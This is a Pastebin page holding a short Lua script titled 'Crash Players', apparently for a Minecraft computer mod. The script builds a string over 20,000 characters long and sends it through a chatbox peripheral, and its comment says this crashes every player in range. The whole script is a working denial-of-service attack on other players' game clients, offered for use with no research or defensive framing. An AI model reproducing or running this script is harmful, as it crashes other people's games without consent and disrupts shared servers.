Advertisement
Derek1017

Crash Players

Jun 21st, 2015
295
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.32 KB | None | 0 0
  1. local crashstring = "    "
  2. -- making the crash string long instead of pasting 40k characters in manually
  3. while #crashstring < 20000 do
  4.   crashstring = crashstring..crashstring
  5. end
  6.  
  7. --Define the chatbox on the right side
  8. local p = peripheral.wrap("right")
  9.  
  10. --Crashes everybody in range of the chatbox
  11. p.say(crashstring)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement